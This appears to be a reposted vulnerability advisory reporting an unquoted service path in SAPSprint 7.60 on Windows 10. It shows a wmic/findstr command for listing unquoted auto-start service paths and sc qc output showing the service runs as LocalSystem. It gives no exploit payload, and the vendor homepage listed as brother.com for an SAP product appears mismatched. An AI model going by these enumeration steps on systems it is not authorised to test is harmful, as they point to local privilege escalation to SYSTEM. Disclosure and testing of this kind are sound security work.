Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863537878

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 21-06-2021
# Vendor Homepage:  https://brother.com/
# Tested Version: 7.60
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

SAPSprint    SAPSprint   C:\Program Files\SAP\SAPSprint\sapsprint.exe   Auto

C:\>sc qc SAPSprint
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SAPSprint
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE        : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME:  C:\Program Files\SAP\SAPSprint\sapsprint.exe
        LOAD_ORDER_GROUP  :
        TAG           : 0
        DISPLAY_NAME     : SAPSprint
        DEPENDENCIES       : Spooler
        SERVICE_START_NAME: LocalSystem